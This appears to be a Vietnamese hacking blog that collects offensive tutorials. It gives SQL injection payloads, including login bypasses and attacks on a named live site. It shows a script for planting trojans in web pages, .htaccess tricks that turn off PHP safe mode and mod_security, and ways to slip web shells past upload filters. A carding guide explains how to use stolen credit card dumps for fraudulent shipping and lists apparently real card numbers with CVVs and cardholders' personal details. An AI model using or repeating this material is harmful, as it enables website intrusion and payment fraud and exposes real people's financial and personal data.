Code Check Sqli 2

***Dạng Basic "and=0":
**Order lỗi : id=123 and=0 UNION SELECT 1,2-- -
Get table,column,data như bt thêm "and=0" sau id.
---------------------------------------------------------------------------
************Dạng Lồng + Bypass bt:
***Order: id=-1' uniounion SELECT 1,2,3-- -
***Get table: id=-1' uniounion SELECT 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()-- -
***Get column:id=-1' uniounion SELECT 1,group_concat(column_name),3 from information_schema.columns where table_name=0x...-- -
***Get Data: id=-1' uniounion SELECT 1,group_concat(tên cột,0x207c20,tên cột,0x207c20),3 from tên table -- -

Xem Thêm

Tổng hợp vài câu lệnh check sqli

Bypass Login Administrator

Username:user ' or 1=1#
Password:pass ' or 1=1#
User: admin'
Pass: or '1'='1
Tìm mã Hex Table:

Encode Mã Hex Table: http://convertstring.com/EncodeDecode/HexEncode

<~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>

Encode:~~~> http://www.base64encode.org/
Decode: ~~~> http://www.base64decode.org/

Xem Thêm

Hướng Dẫn Gắn Keylog Vào Một Website

Cách 1 :Cách đính kèm trojan vào website
Một số cách phổ biến đính kèm trojon vào website như dùng mã 
javascript hay dùng phần mềm ..Xin giới thiệu với các bạn 1 số cách
a,Dùng 1 đoạn mã javascript để mở và phát tán trojan

<script language=javascript>

open(”Địa chỉ con trojan”);

</SCRIPT>Đoạn mã trên bạn chèn vào thẻ body của 1 trang website,khi nạn nhân 
mở website trojan sẽ mở ra và yêu cầu người lướt website mở ra

Xem Thêm

Bảo mật chống Local Attack

Bảo mật chống hack​

Hết 6 bài roài còn bài cuối public nốt :D

Cách bảo mật chống hack rất đơn giản chỉ là chmod và htaccess thôi :))

- public_html : chmod 710
- File config: 400
- Thư mục: 710
- File: 604
- Thư mục upload: 755
- Đặt htaccess chống run shell vào các thư mục upload, thư mục chỉ chứa ảnh:

Mã:

<Files ~ "\.(inc|sql|php|cgi|pl|php4|php5|jsp|txt|kid|cbg|nok|shtml)$">
  order allow,deny
  deny from all
</Files>

- Đặt pass 2 lớp cho admincp
- Di chuyển, dổi tên file config, thư mục admincp
- Sử dụng file scan shell để check shell. Down ở đính kèm nếu bạn chưa có =))
- Backup dữ liệu thường xuyên

Xem Thêm

.htaccess giúp hạ safe mode Off​

Bổ xung thêm một cách tương tự nữa là: Tạo 3 file với tên và nội dung như dưới đây cùng thư mụ với con shell.php
Nhớ tạo thư mục riêng cho con shell trước khi test mấy cái .htaccess kẻo bị lỗi 500 kẹo mút bảo sao xui hỉ.
nội dung file .htaccess:

Xem Thêm

SQLi với .aspx

Victim http://myson.vn/Product_detail.asp?pID='ThinkCentre A70' 
Thêm ' để check lỗi.
Tìm tên các bảng
http://myson.vn/Product_detail.asp?pID='ThinkCentre A70' and 1= convert(int, (select top 1 table_name from information_schema.tables))
đc bảng 'D99_Tmp'
Tiếp tục

Xem Thêm

CCV VÀ CCN LÀ GÌ?

CC được chia ra làm 2 loại:

CCV và CCN
CCV là Credit Card Verify ( hoặc là CVV2, CVV, CVN cũng chính là 1)
CC dạng này thì phải có 1 mã số bảo vệ đi kèm theo khi thanh toán nên loại này rất quý và sử dụng cũng rộng rãi
CCN theo dân UG Việt Nam gọi là CC non (CC dạng này không có mã số bảo vệ)

Một cái CC hợp lệ phải bao gồm đầy đủ các yếu tố sau :

+ Name on Card hay Card holder : Họ tên chủ thẻ .
+ Billing or Mailing Address : Địa chỉ .
+ City : Thành phố .
+ State : Bang ( của US và Canada ) .
+ Zip Code ( Post code ) : Mã vùng .
+ Card number : Số thẻ .
+ Card Exp date : Ngày hết hạn của thẻ .
và có thể có vài thành phần khác như :
+ Phone number : Số phone ( 11 số ) .
+ Fax Number : Số Fax ( 11 số ) .
+ CVV2 hay CVN : cái này là mã số bảo mật in trên CCV .

* CC Number (Card Number): gồm 16 chữ số ( Riêng American Express có 15 số)
Nếu chữ số đầu tiên của dãy là :
4 –> VISA
5 –> Master Card (MC)
6 –> Discover (Dis)
3 –> American Express (AMEX)
Trong đó VISA, Master Card, Discover và American Express là loại thẻ
* EXP: Hạn sử dụng: Nằm sau Số thẻ (Card Number) có dạng tháng / năm (ghi bằng 2 chữ số hoặc đầy đủ) - Ví dụ: 03 | 10
trong đó 03 là tháng và 10 là năm (2010) hoặc 03 | 2010
* CVN (CVV2) : Card Verification Number : gồm 3 chữ số ( AMEX có 4 chữ số ) - Thường nằm sau hạn sử dụng (EXP) đối với
CC không có đầy đủ thông tin
* Zip code (Postal code) :là 5 chữ số nếu CC ở USA.Từ Zip code có thể tìm được ra tên City và State tại
http://local.yahoo.com . Nếu CC ở nước khác –> Dựa vào kinh nghiệm xem cc của bạn
* Nếu chỉ có City mà không biết Bang (State) nằm ở đâu thì có thể vào Google đánh tên City vào sẽ ra tên Bang
Ví dụ 1 CCV:

(Dạng không đầy đủ thông tin)
| 53015 | 4868300255130301 | 6 | 2011 | 176 | Mark | Carlin | 800 W. Caffery Apt 1 | Pharr | Texas | 78577 | 956-739-4424 |
mcarlin76@yahoo.com | United States |

Trong đó | 53015 | đừng nghĩ là số Zip Code nhé, đó là số thứ tự CC nằm trong danh sách CC thôi (Bỏ nó đi)

Trong đó | 4868300255130301 | là số thẻ (Number Card) từ số 4 đầu tiên ta có thể nhận biết rằng CC này thuộc loại VISA

Trong đó | 6 | 2011 | chính là EXP (hạn sử dụng của CC) - EXP Date

Trong đó | 176 | nằm sau EXP chính là số CVV2, CVN, CVV (ở một số shop có thể gọi khác nhau nhưng nó luôn nằm sau khi
nhập EXP hoặc Tên trên thẻ (Name on Card)

Trong đó | Mark | Carlin | - Mark chính là First Name, Carlin là Last Name

Trong đó | 800 W. Caffery Apt 1 | là địa chỉ của chủ thẻ (Địa chỉ thường bắt đầu bằng 1 số và kết thúc bằng St. - Drive - Road
{số bất kỳ} - Apt {số bất kỳ} - Dr. - Rd. - Box {số bất kỳ}... )

Trong đó | Pharr | chính là tên City (Thành phố) thường nằm sau Địa chỉ và kế đến là State (Bang)

Và | Texas | chắc chắn là State (Bang) - nếu may mắn bạn có thể gặp những Bang quen thuộc nên việc đọc CC sẽ dễ hơn

* Lưu ý phần State : Có thể trong một số CC State (Bang) sẽ ghi tên viết tắt, Ví dụ: Texas sẽ ghi là TX, New York sẽ ghi là NY

Tiếp đến | 78577 | sẽ là số Zip Code (luôn luôn là 5 số, đối với một vài CC có số Zip Code là dạng 84578-2658 thì bạn có thể ghi vào nguyên hết hoặc chỉ lấy 5 số đầu)

Kết bên Zip Code là | 956-739-4424 | , đây chính là số điện thoại của chủ thẻ (Phone Number), một vài CC còn ghi liên tiếp
nhau không có dấu ' - ' nhưng vẫn đủ 11 số ( có vài shop khi điền Phone Number thì sẽ chia ra từng khung theo dạng
[XXX]-[XXX]-[XXXX] )

Vừa nhìn vào | mcarlin76@yahoo.com | cũng biết đây chính là Email của chủ thẻ (Trong khi ship tuyệt đối không dùng email của chủ thẻ mà hãy đăng ký một Email trùng tên với chủ thẻ , ví dụ ở đây ta có thể vào Yahoo đăng ký 1 Email tên mcarlin776@yahoo.com ) và phải nhớ Email này để kiểm tra xem ship có thành công hay không.

Và cái cuối cùng là | United States | , đây là tên Quốc Gia đăng ký CC

Và đây là một dạng CCV đầy đủ thông tin:
First Name: Michael
Last Name: Vogel
Company:
Address: 2358 Rosina Dr.
Address 2:
City/Town: Miamisburg
State/Province (US-CDN-AU): OH
Zip / Postal Code: 45342
Country: USA
Phone: 937-859-1668
Fax:
E-mail: ohiostatefn@yahoo.com
Payment Method : Visa
Credit Card : 4121742602096953
Exp. Date : 09/09
CVV2# : 435
(Có 1 số CVV còn có cả Password của Email chủ thẻ, điều này khiến việc ship thành công ở mức cao hơn)

* Một vài CCV làm ví dụ:

|4264290423170877|03|09|527|||Duncan|McCormick|||7 01-857-7996|PO Box 1095|Minot|58702|ND|UNITED STATES|

12:00 AM|VISA| 4640182035183692 |03|10|945|Michael|Stamm|413-586-5354|22 Whittier Street|Florence|01062|MA|USA

711934 | Visa | 4190028630369166 | 11 | 2009 | 591 | tom | hall | | 4017 somerset circle | | casper | WY | 82609 | 3074738469 |
(CCV này có số điện thoại liền nhau, bang viết tắt (WY) là Wyoming, địa chỉ theo dạng bình thường là {số nhà} + {tên đường}
và kế bên là | | ,các bạn đừng hiểu lầm là CC này thiếu thông tin, thật ra đó là Address 2 nhưng nó không cần thiết nên nó
được để trống )
* Các CCV trên đều không có Email vì Email không quan trọng trong việc ship đồ nên các bạn đừng lo (trừ 1 vài trường hợp)

50141 | 4549972363284647| 03 | 2010 | 379 | Ariel L. | Alvarez | PO Box 1377 | Anasco | PR | 00610 | (787)691-1033 | United
States | Boywonder | valerugo@prtc.net
(Trong CCV này First Name của chủ thẻ ghi thiếu hay sao thế nhỉ??, Không phải đâu, Ariel chính là First Name của chủ thẻ
còn L. chính là Tên lót (tên đệm - Middle name) nhưng do shop không có chỗ ghi nên có thể ghi chung vào phần First Name)

* Một CCN ví dụ:

| 5713 | bradley | scruggs | 1301 Williamsburg Dr | | Schaumburg | IL | United States | 60193 | (678) 463-4767 | | |
bks926687@comcast.net | VISA | 4610-0747-4993-4666 | 07/10 | Mar 29 2009 4:48PM

(CCN chỉ khác CCV là không có số Mã bảo mật mà thôi và cũng còn nhiều sự khác nhau về giá trị nhưng các bạn tự tìm hiểu
nhé)

Xem Thêm

Tư Duy Local - Hạ Safemode

php.ini

MÃ: CHỌN TẤT CẢ


safe_mode = Off
disable_functions =""
 

.htaccess

MÃ: CHỌN TẤT CẢ

<IfModule mod_security.c>SecFilterEngine Off
SecFilterScanPOST Off
SecFilterCheckURLEncoding Off
SecFilterCheckCookieFormat Off
SecFilterCheckUnicodeEncoding Off
SecFilterNormalizeCookies Off</IfModule>
 

.htaccess

MÃ: CHỌN TẤT CẢ


AddHandler application/x-httpd-php4 .php .php4 .php3

.htaccess

MÃ: CHỌN TẤT CẢ


php_flag safe_mode off
php_flag disable_functions""
 

.htaccess

MÃ: CHỌN TẤT CẢ


php_admin_value disable_functions""php_admin_value safe_mode off

.htaccess

MÃ: CHỌN TẤT CẢ


php_value safe_mode off
php_value disable_functions"" 
 

.htaccess

MÃ: CHỌN TẤT CẢ


SetEnv PHPRC /home/user/public_html/php.ini

.htaccess

MÃ: CHỌN TẤT CẢ


suPHP_ConfigPath /home/user/public_html/php.ini

.htaccess

MÃ: CHỌN TẤT CẢ

<Files *.php>
ForceType application/x-httpd-php4
</Files>

Xem Thêm

Tấn công XSS và Bypass

1-      XSS là gì ?

       XSS( Cross-Site Scripting ) là một trong những kỹ thuật hack website phổ biến nhất hiện nay bằng cách chèn vào url, chèn qua các thanh tìm kiếm hoặc chèn ở bất cứ 1 textbox nào những thẻ HTML hoặc những đoạn mã script nguy hiểm, từ đó chiếm quyền điều khiển của victim hoặc thực hiện những mệnh lệnh mà hacker đưa ra.

Xem Thêm

Các tuyệt chiêu upload shell

Các chiêu khai thác chiến đấu với anh em softwares cho phép upload nhé:

a. Không thấy cấm loại file nào, thế thì cho nguyên cái gì vào cũng được

b. Thử upload các loại file thông dụng: asp, aspx, php, php3, php5, cgi, pl, py, jsp.

c. Nếu nó cấm hết ở mục b thì ta thử các file pro hơn: exe, bat <— đừng hỏi run cái loại này thế nào nhé . vì đơn giản là mình không biết  ( đùa  )

d. Nếu cho upload mỗi file image (bmp, gif, jpg, jpeg) thì sao ?

+ Thử thay đuôi cá xem : shell.php.jpg

+ Thử chơi NULL byte: shell.php.jpg

+ Thử mấy HEX byte chơi trội: shell.php%25%30%30.jpg

+ Thử mấy Unicode Byte shell.phpU+0025U+0030.jpg

+ Kiếm một file ảnh JPG, nhét nguyên code con shell vào trong comment của photo

+ Chèn code shell vào header của photo

Xem Thêm